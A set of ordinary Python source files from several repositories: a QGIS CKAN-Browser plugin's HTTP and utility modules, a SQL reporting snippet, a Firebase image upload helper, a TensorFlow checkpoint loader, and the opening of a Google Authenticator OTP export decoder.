sql = (
"SELECT COUNT(project_id) cnt, tag FROM " +
" (SELECT tags.project_id, tags.keyword_id, keywords.value tag" +
" FROM tags, keywords WHERE tags.keyword_id=keywords.id) subq" +
" GROUP BY tag")
df = self._load_sql(sql)
df = df.set_index('tag')
sns.set()
df.plot.pie(y='cnt', figsize=(21,18))
plt.title('Density of tags in projects ({:%Y-%m-%d %H:%M})'.format(
datetime.now()), fontsize=30)
plt.legend(
ncol=5,
loc='lower center',
bbox_to_anchor=(0., -0.2, 1., .102),
title='Type of project property (tag)')
# plt.subplots_adjust(left=0.1, bottom=-2.1, right=0.75)
return
def _get_report_3(self, name_only=False):
"""
Number of bids aggregated at week-day level
Returns
-------
Full qualified path.
"""
if name_only:
return "Bids and values"
df = self._load_sql('SELECT COUNT(*) cnt, SUM(price) vals, DATE(created_at) dt FROM bids GROUP BY dt')
assert df.shape[0] > 0, "SQL error in table `bids`"
df = df.sort_values('dt')
vals = df['vals'].fillna(0).values
plt.figure(figsize=(13,8))
ax = sns.barplot(x='dt', y='cnt', data=df)
plt.title('Bids per day with overall values ({:%Y-%m-%d %H:%M})'.format(
datetime.now()), fontsize=30)
plt.xlabel('Date of the bids', fontsize=18)
plt.ylabel('Number of bids', fontsize=18)
for i, p in enumerate(ax.patches):
ax.annotate(
"{:,.1f} lei".format(vals[i]),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='left', va='top', fontsize=12, color='black', rotation=90,
xytext=(0, 10),textcoords='offset points'
)
return
def get_avail_reports(self):
max_rep = 100
avail = {}
for i in range(max_rep+1):
if hasattr(self, self._rep_base + str(i)):
fnc = getattr(self, self._rep_base + str(i))
avail[i] = fnc(True)
return avail
def get_report(self, report_id, png_mode='base64', force_save=False):
if type(report_id) == str:
report_id = int(report_id)
assert png_mode in ['path', 'base64'], "Unknown png_mode '{}'".format(png_mode)
avails = self.get_avail_reports()
if report_id not in avails:
self.P("ERROR: must supply a valid report number {}".format(avails))
return None
self.P("Generating report {} - '{}'".format(report_id, avails[report_id]))
rep_name = '_get_report_'+str(report_id)
rep_fun = getattr(self, rep_name)
rep_fun()
if png_mode == 'path' or force_save:
path = self._save_png(report_id)
if png_mode == 'path':
return path
else:
return self.log.plt_to_base64(plt)
def _save_png(self, report_id):
fn = self.log.save_plot(plt, label='REP_{:02d}'.format(report_id))
plt.close()
return fn
def shutdown(self):
self.db.close()
self.P("Data connection closed.")
if __name__ == '__main__':
l = Logger("TRR", config_file='config/config.txt')
eng = RepEngine(DEBUG=True, log=l)
l.P(eng.get_avail_reports())
simg = eng.get_report('3', png_mode='path')
l.P(simg)
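    # Hedged note (editor): png_mode='base64' would instead return the figure as
    # a base64-encoded PNG via log.plt_to_base64, e.g.
    #   b64_png = eng.get_report(3, png_mode='base64')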
# eng.shutdown()
``` |
{
"source": "4estone/QGIS-CKAN-Browser",
"score": 2
} |
#### File: QGIS-CKAN-Browser/CKAN-Browser/httpcall.py
```python
import inspect
from urllib.parse import unquote
from PyQt5.QtCore import QEventLoop
from PyQt5.QtCore import QUrl
from PyQt5.QtNetwork import QNetworkReply
from PyQt5.QtNetwork import QNetworkRequest
from qgis.core import QgsApplication
from qgis.core import QgsNetworkAccessManager
from .settings import Settings
from .util import Util
class RequestsException(Exception):
pass
class RequestsExceptionTimeout(RequestsException):
pass
class RequestsExceptionConnectionError(RequestsException):
pass
class RequestsExceptionUserAbort(RequestsException):
pass
class HttpCall:
"""
    Wrapper around QgsNetworkAccessManager and QgsAuthManager to make HTTP calls.
"""
def __init__(self, settings, util):
assert isinstance(settings, Settings)
assert isinstance(util, Util)
self.settings = settings
self.util = util
self.reply = None
def execute_request(self, url, **kwargs):
"""
Uses QgsNetworkAccessManager and QgsAuthManager.
"""
method = kwargs.get('http_method', 'get')
headers = kwargs.get('headers', {})
# This fixes a weird error with compressed content not being correctly
# inflated.
# If you set the header on the QNetworkRequest you are basically telling
# QNetworkAccessManager "I know what I'm doing, please don't do any content
# encoding processing".
# See: https://bugs.webkit.org/show_bug.cgi?id=63696#c1
try:
del headers[b'Accept-Encoding']
except KeyError as ke:
# only debugging here as after 1st remove it isn't there anymore
self.util.msg_log_debug(u'unexpected error deleting request header: {}'.format(ke))
pass
# Avoid double quoting form QUrl
url = unquote(url)
self.util.msg_log_debug(u'http_call request: {} {}'.format(method, url))
class Response:
status_code = 200
status_message = 'OK'
text = ''
ok = True
headers = {}
reason = ''
exception = None
def iter_content(self, _):
return [self.text]
self.http_call_result = Response()
url = self.util.remove_newline(url)
req = QNetworkRequest()
req.setUrl(QUrl(url))
req.setAttribute(QNetworkRequest.FollowRedirectsAttribute, True)
for k, v in headers.items():
self.util.msg_log_debug("%s: %s" % (k, v))
try:
req.setRawHeader(k, v)
except:
self.util.msg_log_error(u'FAILED to set header: {} => {}'.format(k, v))
self.util.msg_log_last_exception()
if self.settings.authcfg:
self.util.msg_log_debug(u'before updateNetworkRequest')
QgsApplication.authManager().updateNetworkRequest(req, self.settings.authcfg)
self.util.msg_log_debug(u'before updateNetworkRequest')
if self.reply is not None and self.reply.isRunning():
self.reply.close()
self.util.msg_log_debug(u'getting QgsNetworkAccessManager.instance()')
#func = getattr(QgsNetworkAccessManager.instance(), method)
#func = QgsNetworkAccessManager().get(req)
#manager = QNetworkAccessManager()
#event = QEventLoop()
#response = manager.get(QNetworkRequest(QUrl(url)))
#response.downloadProgress.connect(self.download_progress)
#response.finished.connect(event.quit)
#event.exec()
#response_msg = response.readAll()
##response_msg = str(response_msg)
#response_msg = str(response_msg, encoding='utf-8')
##response_msg = response_msg.decode('utf-8')
#response.deleteLater()
#self.util.msg_log_debug(u'response message:\n{} ...'.format(response_msg[:255]))
#self.http_call_result.text = response_msg # in Python3 all strings are unicode, so QString is not defined
#return self.http_call_result
# Calling the server ...
self.util.msg_log_debug('before self.reply = func(req)')
#self.reply = func(req)
#self.reply = QgsNetworkAccessManager.instance().get(req)
method_call = getattr(QgsNetworkAccessManager.instance(), method)
self.reply = method_call(req)
#self.reply.setReadBufferSize(1024*1024*1024)
#self.reply.setReadBufferSize(1024 * 1024 * 1024 * 1024)
self.reply.setReadBufferSize(0)
self.util.msg_log_debug('after self.reply = func(req)')
# Let's log the whole call for debugging purposes:
if self.settings.debug:
self.util.msg_log_debug("\nSending %s request to %s" % (method.upper(), req.url().toString()))
headers = {str(h): str(req.rawHeader(h)) for h in req.rawHeaderList()}
for k, v in headers.items():
try:
self.util.msg_log_debug("%s: %s" % (k, v))
except:
self.util.msg_log_debug('error logging headers')
if self.settings.authcfg:
self.util.msg_log_debug("update reply w/ authcfg: {0}".format(self.settings.authcfg))
QgsApplication.authManager().updateNetworkReply(self.reply, self.settings.authcfg)
self.util.msg_log_debug('before connecting to events')
# connect downloadProgress event
try:
self.reply.downloadProgress.connect(self.download_progress)
#pass
except:
self.util.msg_log_error('error connecting "downloadProgress" event')
self.util.msg_log_last_exception()
# connect reply finished event
try:
self.reply.finished.connect(self.reply_finished)
#pass
except:
self.util.msg_log_error('error connecting reply "finished" progress event')
self.util.msg_log_last_exception()
self.util.msg_log_debug('after connecting to events')
# Call and block
self.event_loop = QEventLoop()
try:
self.reply.finished.connect(self.event_loop.quit)
except:
self.util.msg_log_error('error connecting reply "finished" progress event to event loop quit')
self.util.msg_log_last_exception()
self.mb_downloaded = 0
# Catch all exceptions (and clean up requests)
self.event_loop.exec()
# Let's log the whole response for debugging purposes:
if self.settings.debug:
self.util.msg_log_debug(
u'\nGot response [{}/{}] ({} bytes) from:\n{}\nexception:{}'.format(
self.http_call_result.status_code,
self.http_call_result.status_message,
len(self.http_call_result.text),
self.reply.url().toString(),
self.http_call_result.exception
)
)
headers = {str(h): str(self.reply.rawHeader(h)) for h in self.reply.rawHeaderList()}
for k, v in headers.items():
self.util.msg_log_debug("%s: %s" % (k, v))
self.util.msg_log_debug("Payload :\n%s ......" % self.http_call_result.text[:255])
self.reply.close()
self.util.msg_log_debug("Deleting reply ...")
try:
self.reply.deleteLater()
except:
self.util.msg_log_error('unexpected error deleting QNetworkReply')
self.util.msg_log_last_exception()
self.reply = None
if self.http_call_result.exception is not None:
self.util.msg_log_error('http_call_result.exception is not None')
self.http_call_result.ok = False
# raise self.http_call_result.exception
return self.http_call_result
def download_progress(self, bytes_received, bytes_total):
mb_received = bytes_received / (1024 * 1024)
if mb_received - self.mb_downloaded >= 1:
self.mb_downloaded = mb_received
self.util.msg_log_debug(
u'downloadProgress {:.1f} of {:.1f} MB" '
.format(mb_received, bytes_total / (1024 * 1024))
)
def reply_finished(self):
self.util.msg_log_debug('------- reply_finished')
try:
err = self.reply.error()
httpStatus = self.reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)
httpStatusMessage = self.reply.attribute(QNetworkRequest.HttpReasonPhraseAttribute)
self.http_call_result.status_code = httpStatus
self.http_call_result.status_message = httpStatusMessage
for k, v in self.reply.rawHeaderPairs():
self.http_call_result.headers[k.data().decode()] = v.data().decode()
self.http_call_result.headers[k.data().decode().lower()] = v.data().decode()
if err == QNetworkReply.NoError:
self.util.msg_log_debug('QNetworkReply.NoError')
self.http_call_result.text = self.reply.readAll()
self.http_call_result.ok = True
else:
self.util.msg_log_error('QNetworkReply Error')
self.http_call_result.ok = False
msg = "Network error #{0}: {1}"\
.format(
self.reply.error(),
self.reply.errorString()
)
self.http_call_result.reason = msg
self.util.msg_log_error(msg)
if err == QNetworkReply.TimeoutError:
self.http_call_result.exception = RequestsExceptionTimeout(msg)
if err == QNetworkReply.ConnectionRefusedError:
self.http_call_result.exception = RequestsExceptionConnectionError(msg)
else:
self.http_call_result.exception = Exception(msg)
except:
self.util.msg_log_error(u'unexpected error in {}'.format(inspect.stack()[0][3]))
self.util.msg_log_last_exception()
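
# Hedged usage sketch (editor's addition, not part of the plugin): inside a
# running QGIS instance this class is meant to be used roughly as
#     response = HttpCall(settings, util).execute_request(
#         'https://demo.ckan.org/api/3/action/package_search?q=spatial',
#         http_method='get')
#     if response.ok:
#         raw_json = response.text  # QByteArray holding the response body
# where 'settings' is the plugin's Settings object and 'util' its Util helper;
# the URL above is only an illustrative example.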
```
#### File: QGIS-CKAN-Browser/CKAN-Browser/util.py
```python
import errno
import os
from fnmatch import filter
import shutil
import subprocess
import sys
import zipfile
import json
from PyQt5.QtCore import \
QCoreApplication, \
QDateTime, \
QDir, \
QFile, \
QFileInfo, \
QIODevice, \
QObject, \
QSettings, \
QUrl, \
QUrlQuery
#SIGNAL, \
#SLOT
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtXml import QDomNode, QDomElement, QDomDocument, QDomNodeList
from qgis.core import QgsMessageLog, QgsVectorLayer, QgsRasterLayer, QgsProviderRegistry
from qgis.core import QgsLayerTreeGroup, QgsProject
from qgis.core import QgsMapLayer
from qgis.core import Qgis
from qgis.utils import iface
class Util:
def __init__(self, settings, main_win):
self.main_win = main_win
self.dlg_caption = settings.DLG_CAPTION
self.settings = settings
# Moved from ckan_browser.py
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
#return QCoreApplication.translate('CKANBrowser', message, None)
return QCoreApplication.translate('self.util', message, None)
def create_dir(self, dir_path):
if not os.path.exists(dir_path):
try:
os.makedirs(dir_path)
except OSError as ose:
if ose.errno != errno.EEXIST:
return False
return True
def check_dir(self, dir_path):
if (
dir_path is None or
dir_path.isspace() or
dir_path == ''
):
return False
if os.path.isdir(dir_path):
# TODO check write permissions
return True
return self.create_dir(dir_path)
def check_api_url(self, api_url):
if(
not api_url or
api_url is None or
api_url.isspace() or
api_url == ''
):
return False
else:
return True
def extract_zip(self, archive, dest_dir):
try:
# zf.extractall(dest_dir) fails for umlauts
# https://github.com/joeferraro/MavensMate/pull/27/files
f = zipfile.ZipFile(archive, 'r')
self.msg_log_debug(u'dest_dir: {0}'.format(dest_dir))
for file_info in f.infolist():
#file_name = os.path.join(dest_dir, file_info.filename.decode('utf8'))
#decode('utf8') fails on Windows with umlauts in filenames
file_name = os.path.join(dest_dir, file_info.filename)
# different types of ZIPs
# some have a dedicated entry for folders
if file_name[-1] == u'/':
if not os.path.exists(file_name):
os.makedirs(file_name)
continue
                # some don't have a dedicated entry for the folder
# extract folder info from file name
extract_dir = os.path.dirname(file_name)
if not os.path.exists(extract_dir):
                    os.makedirs(extract_dir)
out_file = open(file_name, 'wb')
shutil.copyfileobj(f.open(file_info.filename), out_file)
return True, None
except UnicodeDecodeError as ude:
return False, u'UnicodeDecodeError: {0}'.format(ude)
except AttributeError as ae:
return False, u'AttributeError: {0}'.format(ae)
except:
self.msg_log_debug(u'Except: {0}'.format(sys.exc_info()[1]))
return False, u'Except: {0}'.format(sys.exc_info()[1])
def add_lyrs_from_dir(self, data_dir, layer_name, layer_url):
try:
file_types = (
'*.[Ss][Hh][Pp]',
'*.[Gg][Mm][Ll]',
'*.[Gg][Ee][Oo][Rr][Ss][Ss]',
'*.[Xx][Mm][Ll]',
'*.[Cc][Ss][Vv]',
'*.[Tt][Xx][Tt]',
'*.[Pp][Dd][Ff]',
'*.[Tt][Ii][Ff]',
'*.[Tt][Ii][Ff][Ff]',
'*.[Aa][Ss][Cc]',
'*.[Qq][Ll][Rr]',
'*.[Ii][Mm][Gg]',
'*.[Jj][2][Kk]',
'*.[Jj][Pp][2]',
'*.[Rr][Ss][Tt]',
'*.[Dd][Ee][Mm]',
'*.[Ww][Mm][Tt][Ss]',
'*.[Ww][Mm][Ss]',
'*.[Ww][Ff][Ss]',
'*.[Kk][Mm][Ll]',
'*.[Xx][Ll][Ss]',
'*.[Xx][Ll][Ss][Xx]',
'*.[Dd][Oo][Cc]',
'*.[Dd][Oo][Cc][Xx]',
'*.[Jj][Pp][Gg]',
'*.[Jj][Pp][Ee][Gg]',
'*.[Pp][Nn][Gg]',
'*.*[Jj][Ss][Oo][Nn]'
)
geo_files = []
for file_type in file_types:
### python 3.5
# glob_term = os.path.join(data_dir, '**', file_type)
# geo_files.extend(glob.glob(glob_term))
### python > 2.2
for root, dir_names, file_names in os.walk(data_dir):
for file_name in filter(file_names, file_type):
geo_files.append(os.path.join(root, file_name))
self.msg_log_debug(u'add lyrs: {0}'.format(data_dir))
self.msg_log_debug(u'add lyrs: {0}'.format('\n'.join(geo_files)))
if len(geo_files) < 1:
self.msg_log_debug('len(geo_files)<1')
                # return False, u'No displayable data found in\n{0}.\n\n\n ===----!!!TODO!!!----===\n\nOffer the user to open the directory'.format(dir)
                return False, {"message": "unknown filetype", "dir_path": data_dir}
for geo_file in geo_files:
if os.path.basename(geo_file).lower().endswith('.shp.xml'):
self.msg_log_debug(u'skipping {0}'.format(geo_file))
continue
self.msg_log_debug(geo_file)
full_path = os.path.join(data_dir, geo_file)
full_layer_name = layer_name + ' - ' + os.path.basename(geo_file)
low_case = os.path.basename(geo_file).lower()
lyr = None
if low_case.endswith('json'):
self.msg_log_debug(u'Open JSON')
if False is self.__is_geojson(full_path):
if self.__open_with_system(full_path) > 0:
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
if(
low_case.endswith('.txt') or
low_case.endswith('.pdf') or
low_case.endswith('.xls') or
low_case.endswith('.xlsx') or
low_case.endswith('.doc') or
low_case.endswith('.docx') or
low_case.endswith('.jpg') or
low_case.endswith('.jpeg') or
low_case.endswith('.png')
):
if self.__open_with_system(full_path) > 0:
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
elif low_case.endswith('.qlr'):
lyr = self.__add_layer_definition_file(
full_path,
QgsProject.instance().layerTreeRoot()
)
elif low_case.endswith('.wmts') or low_case.endswith('.wms'): # for now, we assume it's a WMTS
self.msg_log_debug(u'Open WM(T)S')
self._open_wmts(layer_name, layer_url)
continue
                elif low_case.endswith('.wfs'):  # for now, we assume it's a WFS
self.msg_log_debug(u'Open WFS')
self._open_wfs(layer_name, layer_url)
continue
elif low_case.endswith('.csv'):
# lyr = self.__add_csv_table(full_path, full_layer_name)
self.msg_log_debug(u'Open CSV')
self._open_csv(full_path)
continue
elif(
low_case.endswith('.asc') or
low_case.endswith('.tif') or
low_case.endswith('.tiff') or
low_case.endswith('.img') or
low_case.endswith('.jp2') or
low_case.endswith('.j2k') or
low_case.endswith('.rst') or
low_case.endswith('.dem')
):
lyr = self.__add_raster_layer(full_path, full_layer_name)
else:
lyr = self.__add_vector_layer(full_path, full_layer_name)
if lyr is not None:
if not lyr.isValid():
self.msg_log_debug(u'not valid: {0}'.format(full_path))
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
QgsProject.instance().addMapLayer(lyr)
else:
self.msg_log_debug(u'could not add layer: {0}'.format(full_path))
return True, None
except AttributeError as ae:
return False, u'AttributeError: {}'.format(ae)
except TypeError as te:
return False, u'TypeError: {}'.format(te)
except:
return False, sys.exc_info()[0]
def __add_vector_layer(self, file_name, full_layer_name):
        self.msg_log_debug(u'vector layer {0}'.format(file_name))
lyr = QgsVectorLayer(
file_name,
full_layer_name,
'ogr'
)
return lyr
def __add_raster_layer(self, file_name, full_layer_name):
        self.msg_log_debug(u'raster layer {0}'.format(file_name))
lyr = QgsRasterLayer(
file_name,
full_layer_name
)
return lyr
def __add_csv_table(self, file_name, full_layer_name):
        self.msg_log_debug(u'csv layer {0}'.format(file_name))
# file:///f:/scripts/map/points.csv?delimiter=%s&
# file:///home/bergw/open-data-ktn-cache-dir/42b67af7-f795-48af-9de0-25c8d777bb50/d5ea898b-2ee7-4b52-9b7d-412826d73e45/schuler-und-klassen-kaernten-gesamt-sj-2014-15.csv?encoding=ISO-8859-1&type=csv&delimiter=;&geomType=none&subsetIndex=no&watchFile=no
# file:///C:/Users/bergw/_TEMP/open-data-ktn-cache-2/wohnbevgemeinzeljahre-2014-WINDOWS.csv?encoding=windows-1252&type=csv&delimiter=%5Ct;&geomType=none&subsetIndex=no&watchFile=no
slashes = '//'
if os.name == 'nt':
slashes += '/'
lyr_src = u'file:{0}{1}?encoding=ISO-8859-1&type=csv&delimiter=;&geomType=none&subsetIndex=no&watchFile=no'.format(
slashes,
file_name
)
lyr = QgsVectorLayer(
lyr_src,
full_layer_name,
'delimitedtext'
)
return lyr
def __add_layer_definition_file(self, file_name, root_group):
"""
shamelessly copied from
https://github.com/qgis/QGIS/blob/master/src/core/qgslayerdefinition.cpp
"""
qfile = QFile(file_name)
if not qfile.open(QIODevice.ReadOnly):
return None
doc = QDomDocument()
if not doc.setContent(qfile):
return None
file_info = QFileInfo(qfile)
QDir.setCurrent(file_info.absoluteDir().path())
root = QgsLayerTreeGroup()
ids = doc.elementsByTagName('id')
for i in range(0, ids.size()):
id_node = ids.at(i)
id_elem = id_node.toElement()
old_id = id_elem.text()
layer_name = old_id[:-17]
date_time = QDateTime.currentDateTime()
new_id = layer_name + date_time.toString('yyyyMMddhhmmsszzz')
id_elem.firstChild().setNodeValue(new_id)
tree_layer_nodes = doc.elementsByTagName('layer-tree-layer')
for j in range(0, tree_layer_nodes.count()):
layer_node = tree_layer_nodes.at(j)
layer_elem = layer_node.toElement()
if old_id == layer_elem.attribute('id'):
layer_node.toElement().setAttribute('id', new_id)
layer_tree_elem = doc.documentElement().firstChildElement('layer-tree-group')
load_in_legend = True
if not layer_tree_elem.isNull():
root.readChildrenFromXML(layer_tree_elem)
load_in_legend = False
layers = QgsMapLayer.fromLayerDefinition(doc)
QgsProject.instance().addMapLayers(layers, load_in_legend)
nodes = root.children()
for node in nodes:
root.takeChild(node)
del root
root_group.insertChildNodes(-1, nodes)
return None
def _open_wmts(self, name, capabilites_url):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
self.msg_log_debug(u'add WM(T)S: Name = {0}, URL = {1}'.format(name, capabilites_url))
s = QSettings()
s.setValue(u'qgis/WMS/{0}/password'.format(name), '')
s.setValue(u'qgis/WMS/{0}/username'.format(name), '')
s.setValue(u'qgis/WMS/{0}/authcfg'.format(name), '')
s.setValue(u'qgis/connections-wms/{0}/dpiMode'.format(name), 7) # refer to https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp#L229-L247
s.setValue(u'qgis/connections-wms/{0}/ignoreAxisOrientation'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/ignoreGetFeatureInfoURI'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/ignoreGetMapURI'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/invertAxisOrientation'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/referer'.format(name), '')
s.setValue(u'qgis/connections-wms/{0}/smoothPixmapTransform'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/url'.format(name), capabilites_url)
s.setValue(u'qgis/connections-wms/selected', name)
if self.settings.auth_propagate and self.settings.authcfg:
s.setValue(u'qgis/WMS/{0}/authcfg'.format(name), self.settings.authcfg)
# create new dialog
wms_dlg = QgsProviderRegistry.instance().createSelectionWidget("wms", self.main_win)
wms_dlg.addRasterLayer.connect(iface.addRasterLayer)
wms_dlg.show()
def _open_wfs(self, name, capabilites_url):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
# https://github.com/qgis/QGIS/blob/79616fd8d8285b4eb93adafdfcb97a3e429b832e/src/app/qgisapp.cpp#L3783
self.msg_log_debug(u'add WFS: Name={0}, original URL={1}'.format(name, capabilites_url))
        # remove additional url parameters, otherwise adding wfs works the first time only
# https://github.com/qgis/QGIS/blob/9eee12111567a84f4d4de7e020392b3c01c28598/src/gui/qgsnewhttpconnection.cpp#L199-L214
url = QUrl(capabilites_url)
query_string = url.query()
if query_string:
query_string = QUrlQuery(query_string)
query_string.removeQueryItem('SERVICE')
query_string.removeQueryItem('REQUEST')
query_string.removeQueryItem('FORMAT')
query_string.removeQueryItem('service')
query_string.removeQueryItem('request')
query_string.removeQueryItem('format')
#also remove VERSION: shouldn't be necessary, but QGIS sometimes seems to append version=1.0.0
query_string.removeQueryItem('VERSION')
query_string.removeQueryItem('version')
url.setQuery(query_string)
capabilites_url = url.toString()
self.msg_log_debug(u'add WFS: Name={0}, base URL={1}'.format(name, capabilites_url))
s = QSettings()
self.msg_log_debug(u'existing WFS url: {0}'.format(s.value(u'qgis/connections-wfs/{0}/url'.format(name), '')))
key_user = u'qgis/WFS/{0}/username'.format(name)
key_pwd = u'qgis/WFS/{0}/password'.format(name)
key_referer = u'qgis/connections-wfs/{0}/referer'.format(name)
key_url = u'qgis/connections-wfs/{0}/url'.format(name)
key_authcfg = u'qgis/WFS/{0}/authcfg'.format(name)
s.remove(key_user)
s.remove(key_pwd)
s.remove(key_referer)
s.remove(key_url)
s.sync()
s.setValue(key_user, '')
s.setValue(key_pwd, '')
s.setValue(key_referer, '')
s.setValue(key_url, capabilites_url)
if self.settings.auth_propagate and self.settings.authcfg:
s.setValue(key_authcfg, self.settings.authcfg)
s.setValue(u'qgis/connections-wfs/selected', name)
# create new dialog
        wfs_dlg = QgsProviderRegistry.instance().createSelectionWidget("WFS", self.main_win)
wfs_dlg.addVectorLayer.connect(lambda url: iface.addVectorLayer(url, name, "WFS"))
wfs_dlg.show()
def _open_csv(self, full_path):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
self.msg_log_debug(u'add CSV file: {0}'.format(full_path))
name = os.path.basename(full_path)
# create new dialog
csv_dlg = QgsProviderRegistry.instance().createSelectionWidget("delimitedtext", self.main_win)
csv_dlg.addVectorLayer.connect(lambda url: iface.addVectorLayer(url, name, "delimitedtext"))
csv_dlg.children()[1].children()[2].setFilePath(full_path)
csv_dlg.show()
def __open_with_system(self, file_name):
code = None
if sys.platform.startswith('darwin'):
code = subprocess.call(('open', file_name))
elif os.name == 'nt':
            # os.startfile returns None, so treat a non-raising call as success
            os.startfile(file_name)
            code = 0
elif os.name == 'posix':
code = subprocess.call(('xdg-open', file_name))
self.msg_log_debug(u'Exit Code: {0}'.format(code))
return code
def __is_geojson(self, file_path):
try:
with open(file_path) as json_file:
data = json.load(json_file)
if data.get('features') is not None:
self.msg_log_debug('is_geojson: "features" found')
return True
                elif data.get('type') == "FeatureCollection":
self.msg_log_debug('is_geojson: "FeatureCollection" found')
return True
else:
return False
except:
            self.msg_log_debug(u'Error reading json: {0}'.format(sys.exc_info()[1]))
return False
def dlg_information(self, msg):
QMessageBox.information(self.main_win, self.dlg_caption, msg)
def dlg_warning(self, msg):
QMessageBox.warning(self.main_win, self.dlg_caption, msg)
def dlg_yes_no(self, msg):
return QMessageBox.question(
self.main_win,
self.dlg_caption,
msg,
QMessageBox.Yes,
QMessageBox.No
)
def msg_log_debug(self, msg):
if self.settings.debug is True:
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Info)
def msg_log_warning(self, msg):
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Warning)
def msg_log_error(self, msg):
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Critical)
def msg_log_last_exception(self):
exc_type, exc_value, exc_traceback = sys.exc_info()
self.msg_log_error(
u'\nexc_type: {}\nexc_value: {}\nexc_traceback: {}'
.format(exc_type, exc_value, exc_traceback)
)
def remove_newline(self, url):
if '\r\n' in url:
self.msg_log_debug(u'Windows style new line found in resource url')
url = url.replace('\r\n', '')
if '\n' in url:
self.msg_log_debug(u'Linux style new line found in resource url')
url = url.replace('\n', '')
return url
def resolve(self, name, base_path=None):
"""http://gis.stackexchange.com/a/130031/8673"""
if not base_path:
base_path = os.path.dirname(os.path.realpath(__file__))
return os.path.join(base_path, name)
def open_in_manager(self, file_path):
"""http://stackoverflow.com/a/6631329/1504487"""
self.msg_log_debug(
u'open_in_manager, os.name: {} platform: {}\npath: {}'
.format(os.name, sys.platform, file_path)
)
if sys.platform == 'darwin':
subprocess.Popen(['open', file_path])
elif sys.platform == 'linux' or sys.platform == 'linux2':
subprocess.Popen(['xdg-open', file_path])
elif os.name == 'nt' or sys.platform == 'win32':
file_path = os.path.normpath(file_path)
self.msg_log_debug(u'normalized path: {}'.format(file_path))
subprocess.Popen(['explorer', file_path])
def str2bool(self, v):
"""http://stackoverflow.com/a/715468/1504487"""
return v.lower() in ("yes", "true", "t", "1")
``` |
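The `_open_wfs` method above strips service-related query parameters from the capabilities URL before handing it to QGIS, otherwise adding the WFS connection works only the first time. A minimal, hedged sketch of just that clean-up step, runnable with plain PyQt5 and an illustrative URL:
```python
# Hedged sketch of the capabilities-URL clean-up performed in _open_wfs above.
# The URL below is illustrative only.
from PyQt5.QtCore import QUrl, QUrlQuery

url = QUrl("https://example.org/ows?service=WFS&request=GetCapabilities&version=1.0.0&map=foo")
query = QUrlQuery(url.query())
for key in ("SERVICE", "REQUEST", "FORMAT", "VERSION",
            "service", "request", "format", "version"):
    query.removeQueryItem(key)
url.setQuery(query)
print(url.toString())  # https://example.org/ows?map=foo
```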
{
"source": "4evernaive/YOLOv3Tiny_Face_Mask",
"score": 3
} |
#### File: 4evernaive/YOLOv3Tiny_Face_Mask/store_image.py
```python
import cv2.cv2 as cv2
import firebase_admin
from firebase_admin import credentials
from firebase_admin import storage
import numpy
import base64
cred = credentials.Certificate("serviceAccountKey.json")
firebase_admin.initialize_app(cred,{'storageBucket': 'chatbot-108aea001-296006.appspot.com'})
def storeImage(image, uuid):#frame,id
print('[INFO] Run <storeImage> function now.')
#img = cv2.cvtColor(numpy.asarray(integrationModel.frame["image"]),cv2.COLOR_RGB2BGR)
img = image
img = base64.b64encode(cv2.imencode('.png', img)[1]).decode()
bucket = storage.bucket()
img = base64.b64decode(img)
blob = bucket.blob('image/' +"nomask-"+uuid+'.png')
blob.upload_from_string(img)
frameUrl = blob.public_url
blob.make_public()
print("[INFO] Image has been uploaded to Firebase Storage\n[LINK] "+frameUrl)
return frameUrl
``` |
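A hedged usage sketch for `storeImage`: the frame file and uuid are placeholders, a valid `serviceAccountKey.json` plus the bucket configured above are assumed to exist, and the module is assumed to be importable as `store_image`.
```python
import uuid
import cv2

from store_image import storeImage  # importing also initializes the Firebase app above

frame = cv2.imread("sample_frame.png")             # any BGR frame, e.g. from a detector
public_url = storeImage(frame, str(uuid.uuid4()))  # uploads image/nomask-<uuid>.png
print(public_url)                                  # public link returned by the function
```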
{
"source": "4everzyj/tensorflow-yolov3",
"score": 2
} |
#### File: tensorflow-yolov3/dev/ckpt_loader.py
```python
import tensorflow as tf
import time
def save_graph():
# saver = tf.train.import_meta_graph("../checkpoint/yolov3_coco.ckpt.meta", clear_devices=True)
saver = tf.train.import_meta_graph("../checkpoint/yolov3_coco_demo.ckpt.meta", clear_devices=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# saver.restore(sess, "../checkpoint/yolov3_coco.ckpt")
saver.restore(sess, "../checkpoint/yolov3_coco_demo.ckpt")
# save
localtime = time.strftime("%Y%m%d_%H%M%S", time.localtime())
train_writer = tf.summary.FileWriter("../log/%s" % localtime, sess.graph)
if __name__ == "__main__":
save_graph()
``` |
{
"source": "4f77616973/Wristkey",
"score": 3
} |
#### File: main/python/extract_otp_secret_keys.py
```python
import base64
import fileinput
import sys
from urllib.parse import parse_qs, urlencode, urlparse, quote
from os import path, mkdir
from re import sub, compile as rcompile
import generated_python.google_auth_pb2
def decode(url):
# https://stackoverflow.com/questions/40226049/find-enums-listed-in-python-descriptor-for-protobuf
def get_enum_name_by_number(parent, field_name):
